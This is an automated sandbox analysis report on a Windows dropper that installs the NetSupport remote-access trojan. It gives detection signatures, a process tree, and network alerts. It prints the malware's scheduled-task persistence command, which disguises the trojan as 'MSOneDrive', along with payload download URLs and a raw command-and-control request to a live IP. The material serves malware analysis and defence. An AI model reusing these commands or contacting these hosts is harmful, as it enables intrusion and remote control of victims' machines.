Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe

Overview

General Information

Sample name:SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe
Analysis ID:1514955
MD5:aace5ed77f7d47cad3e45e0ccdc5411c
SHA1:cb9c403e8ba1a5531543d6c3b46250065b7f49c0
SHA256:a179d25f0ca4b9f6b7b1b7b4376664e422a6341650f80ba58626881638b64d50
Tags:exe
Infos:

Detection

NetSupport RAT
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
AI detected suspicious sample
Contains functionalty to change the wallpaper
Delayed program exit found
Found evasive API chain (may stop execution after checking mutex)
Machine Learning detection for sample
Uses schtasks.exe or at.exe to add and modify task schedules
Binary contains a suspicious time stamp
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the clipboard data
Contains functionality to record screenshots
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables security privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evaded block containing many API calls
Found evasive API chain (date check)
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Potential key logger detected (key state polling based)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses the system / local time for branch decision (may execute only at specific dates)
Yara detected Keylogger Generic
Yara detected NetSupport remote tool

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe (PID: 4504 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe" MD5: AACE5ED77F7D47CAD3E45E0CCDC5411C)
    • schtasks.exe (PID: 7376 cmdline: "C:\Windows\system32\schtasks.exe" /create /sc ONLOGON /tn "MSOneDrive" /tr "C:\Users\user\AppData\Local/MSOneDrive\client32.exe" /RL HIGHEST MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7392 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • client32.exe (PID: 7384 cmdline: C:\Users\user\AppData\Local/MSOneDrive\client32.exe MD5: F6ABEF857450C97EA74CD8F0EB9A8C0A)
  • client32.exe (PID: 7512 cmdline: C:\Users\user\AppData\Local/MSOneDrive\client32.exe MD5: F6ABEF857450C97EA74CD8F0EB9A8C0A)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\MSOneDrive\client32.exeJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
    C:\Users\user\AppData\Local\MSOneDrive\AudioCapture.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
      C:\Users\user\AppData\Local\MSOneDrive\TCCTL32.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
        C:\Users\user\AppData\Local\MSOneDrive\PCICHEK.DLLJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
          C:\Users\user\AppData\Local\MSOneDrive\pcicapi.dllJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
            Click to see the 2 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
              0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                  0000000D.00000002.1391294248.00000000111CD000.00000004.00000001.01000000.00000008.sdmpJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                    0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                      Click to see the 9 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      13.0.client32.exe.9d0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                        11.2.client32.exe.6cb70000.6.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                          11.0.client32.exe.9d0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                            13.2.client32.exe.6cb70000.5.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                              11.2.client32.exe.9d0000.0.unpackJoeSecurity_NetSupportYara detected NetSupport remote toolJoe Security
                                Click to see the 11 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Suricata Signatures

                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-21T14:45:31.650706+020028033053Unknown Traffic192.168.2.749700142.11.212.184443TCP
                                2024-09-21T14:45:36.119849+020028033053Unknown Traffic192.168.2.749701142.11.212.184443TCP
                                2024-09-21T14:45:37.285896+020028033053Unknown Traffic192.168.2.749702142.11.212.184443TCP
                                2024-09-21T14:45:38.537220+020028033053Unknown Traffic192.168.2.749703142.11.212.184443TCP
                                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                                2024-09-21T14:45:24.705430+020028277451Malware Command and Control Activity Detected192.168.2.74970437.1.209.225443TCP
                                2024-09-21T14:45:24.705430+020028277451Malware Command and Control Activity Detected192.168.2.76301637.1.209.225443TCP
                                2024-09-21T14:45:24.705430+020028277451Malware Command and Control Activity Detected192.168.2.76302037.1.209.225443TCP
                                2024-09-21T14:45:24.705430+020028277451Malware Command and Control Activity Detected192.168.2.76301937.1.209.225443TCP
                                2024-09-21T14:45:24.705430+020028277451Malware Command and Control Activity Detected192.168.2.76301837.1.209.225443TCP
                                2024-09-21T14:45:24.705430+020028277451Malware Command and Control Activity Detected192.168.2.76302137.1.209.225443TCP
                                2024-09-21T14:45:24.705430+020028277451Malware Command and Control Activity Detected192.168.2.76301737.1.209.225443TCP

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Multi AV Scanner detection for submitted file
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeReversingLabs: Detection: 68%
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeVirustotal: Detection: 54%Perma Link
                                AI detected suspicious sample
                                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                                Machine Learning detection for sample
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110A57F0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,11_2_110A57F0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110A57F0 GetModuleHandleA,GetProcAddress,GetProcAddress,GetLastError,wsprintfA,GetLastError,_memset,CryptGetProvParam,CryptGetProvParam,GetLastError,_memset,CryptGetProvParam,GetLastError,GetLastError,GetLastError,GetLastError,_malloc,GetLastError,_free,GetLastError,CryptReleaseContext,SetLastError,FreeLibrary,13_2_110A57F0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeFile opened: C:\Users\user\AppData\Local\MSOneDrive\MSVCR100.dllJump to behavior
                                Source: unknownHTTPS traffic detected: 142.11.212.184:443 -> 192.168.2.7:49700 version: TLS 1.2
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: ir41_qcx.pdb source: ir41_qcx.dll.3.dr
                                Source: Binary string: uimanagerbrokerps.pdb source: UIManagerBrokerps.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcichek.pdb source: client32.exe, 0000000B.00000002.3755622548.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, client32.exe, 0000000D.00000002.1392811349.000000006CB72000.00000002.00000001.01000000.00000009.sdmp, PCICHEK.DLL.3.dr
                                Source: Binary string: ir50_32.pdb source: ir50_32.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1201\1201F2\client32\Release\PCICL32.pdb source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.dr
                                Source: Binary string: stub.pdbGCTL source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
                                Source: Binary string: icmp.pdbGCTL source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
                                Source: Binary string: smalldll.pdbGCTL source: dxmasf.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280f12\AudioCapture\Release\AudioCapture.pdb source: AudioCapture.dll.3.dr
                                Source: Binary string: icmp.pdb source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, icmp.dll.3.dr
                                Source: Binary string: winrssrv.pdbGCTL source: winrssrv.dll.3.dr
                                Source: Binary string: wiatrace.pdb source: wiatrace.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1280\1280\ctl32\release_unicode\pcicapi.pdb source: client32.exe, 0000000B.00000002.3755499542.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, client32.exe, 0000000D.00000002.1392710495.000000006CB45000.00000002.00000001.01000000.0000000A.sdmp, pcicapi.dll.3.dr
                                Source: Binary string: E:\DNA\DNABuilds\DNA450\DNA450F3i1\client32\release_unicode_2015\dnarc.pdb source: client32.exe, 0000000B.00000000.1369497547.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000B.00000002.3742058275.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000000.1388077049.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe, 0000000D.00000002.1390661255.00000000009D2000.00000002.00000001.01000000.00000007.sdmp, client32.exe.3.dr
                                Source: Binary string: smalldll.pdb source: dxmasf.dll.3.dr
                                Source: Binary string: E:\nsmsrc\NSN\300\CVA_300F1\Ctl32\release\htctl32.pdb source: client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.dr
                                Source: Binary string: winrssrv.pdb source: winrssrv.dll.3.dr
                                Source: Binary string: msvcr100.i386.pdb source: client32.exe, client32.exe, 0000000B.00000002.3755290602.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, client32.exe, 0000000D.00000002.1392381174.000000006CA71000.00000020.00000001.01000000.0000000B.sdmp, msvcr100.dll.3.dr
                                Source: Binary string: ir50_32.pdbGCTL source: ir50_32.dll.3.dr
                                Source: Binary string: uimanagerbrokerps.pdbGCTL source: UIManagerBrokerps.dll.3.dr
                                Source: Binary string: wiatrace.pdbUGP source: wiatrace.dll.3.dr
                                Source: Binary string: WFAPIGP.pdb source: wfapigp.dll.3.dr
                                Source: Binary string: WerEnc.pdb source: WerEnc.dll.3.dr
                                Source: Binary string: stub.pdb source: dpnhupnp.dll.3.dr, dpnathlp.dll.3.dr, dpnlobby.dll.3.dr
                                Source: Binary string: GetUName.pdbGCTL source: getuname.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdb source: TCCTL32.DLL.3.dr
                                Source: Binary string: WFAPIGP.pdbUGP source: wfapigp.dll.3.dr
                                Source: Binary string: GetUName.pdb source: getuname.dll.3.dr
                                Source: Binary string: E:\nsmsrc\nsm\1210\1210f\ctl32\release\tcctl32.pdbP source: TCCTL32.DLL.3.dr
                                Source: Binary string: d:\a01\_work\2\s\\binaries\x86ret\bin\i386\\msvcp140_codecvt_ids.i386.pdb source: msvcp140_codecvt_ids.dll.3.dr
                                Source: Binary string: WerEnc.pdbGCTL source: WerEnc.dll.3.dr
                                Source: Binary string: ir41_qcx.pdbGCTL source: ir41_qcx.dll.3.dr
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C8F905 FindFirstFileExW,3_2_00C8F905
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,11_2_11061140
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,11_2_11065870
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,11_2_110B3B00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,11_2_1102BB50
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,11_2_111180C0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 11_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,11_2_110FE450
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_1102BB50 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,13_2_1102BB50
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11061140 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,13_2_11061140
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_11065870 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,GetLastError,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,13_2_11065870
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110B3B00 GetFileAttributesA,CreateDirectoryA,FindFirstFileA,CopyFileA,CopyFileA,FindNextFileA,FindClose,DrawMenuBar,13_2_110B3B00
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_111180C0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,13_2_111180C0
                                Source: C:\Users\user\AppData\Local\MSOneDrive\client32.exeCode function: 13_2_110FE450 _memset,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,13_2_110FE450

                                Networking

                                barindex
                                Suricata IDS alerts for network traffic
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:49704 -> 37.1.209.225:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63016 -> 37.1.209.225:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63020 -> 37.1.209.225:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63019 -> 37.1.209.225:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63018 -> 37.1.209.225:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63021 -> 37.1.209.225:443
                                Source: Network trafficSuricata IDS: 2827745 - Severity 1 - ETPRO MALWARE NetSupport RAT CnC Activity : 192.168.2.7:63017 -> 37.1.209.225:443
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn1.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn2.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn3.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn4.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: Joe Sandbox ViewIP Address: 172.67.68.212 172.67.68.212
                                Source: Joe Sandbox ViewASN Name: HVC-ASUS HVC-ASUS
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49700 -> 142.11.212.184:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49701 -> 142.11.212.184:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49702 -> 142.11.212.184:443
                                Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.7:49703 -> 142.11.212.184:443
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exeCode function: 3_2_00C825B0 GetProcessHeap,InternetOpenW,InternetOpenUrlW,GetProcessHeap,InternetReadFile,GetProcessHeap,HeapAlloc,GetProcessHeap,RtlReAllocateHeap,GetProcessHeap,RtlAllocateHeap,GetProcessHeap,RtlFreeHeap,InternetCloseHandle,InternetCloseHandle,3_2_00C825B0
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn1.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn2.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn3.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /ssd/sdn4.zip HTTP/1.1Host: mlm-cdn.com
                                Source: global trafficHTTP traffic detected: GET /location/loca.asp HTTP/1.1Host: geo.netsupportsoftware.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficDNS traffic detected: DNS query: mlm-cdn.com
                                Source: global trafficDNS traffic detected: DNS query: armayalitim.com
                                Source: global trafficDNS traffic detected: DNS query: armayalitim1722.com
                                Source: global trafficDNS traffic detected: DNS query: geo.netsupportsoftware.com
                                Source: unknownHTTP traffic detected: POST http://37.1.209.225/fakeurl.htm HTTP/1.1User-Agent: NetSupport Manager/1.3Content-Type: application/x-www-form-urlencodedContent-Length: 22Host: 37.1.209.225Connection: Keep-AliveCMD=POLLINFO=1ACK=1Data Raw: Data Ascii:
                                Source: client32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://%s/fakeurl.htm
                                Source: client32.exe, client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://%s/testpage.htm
                                Source: client32.exe, 0000000B.00000002.3755148279.000000006C83E000.00000002.00000001.01000000.0000000C.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://%s/testpage.htmwininet.dll
                                Source: client32.exe, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://127.0.0.1
                                Source: client32.exe, 0000000B.00000002.3754701171.0000000011181000.00000002.00000001.01000000.00000008.sdmp, client32.exe, 0000000D.00000002.1391176312.0000000011181000.00000002.00000001.01000000.00000008.sdmp, PCICL32.DLL.3.drString found in binary or memory: http://127.0.0.1RESUMEPRINTING
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://crl.globalsign.com/gs/gscodesignsha2g2.crl0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.drString found in binary or memory: http://crl.globalsign.net/root-r3.crl0
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1372124884.00000000037A4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microso
                                Source: remcmdstub.exe.3.drString found in binary or memory: http://crl.sectigo.com/COMODOTimeStampingCA_2.crl0r
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                                Source: pcicapi.dll.3.dr, remcmdstub.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drString found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010CF000.00000004.00000020.00020000.00000000.sdmp, HTCTL32.DLL.3.dr, PCICL32.DLL.3.drString found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
                                Source: remcmdstub.exe.3.drString found in binary or memory: http://crt.sectigo.com/COMODOTimeStampingCA_2.crt0#
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, PCICHEK.DLL.3.drString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                                Source: pcicapi.dll.3.dr, remcmdstub.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
                                Source: SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000002.1370482187.00000000010FB000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.16193.30488.exe, 00000003.00000003.1368006900.0000000001127000.00000004.00000020.00020000.00000000.sdmp, AudioCapture.dll.3.dr, pcicapi.dll.3.dr, PCICHEK.DLL.3.dr, remcmdstub.exe.3.drString found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
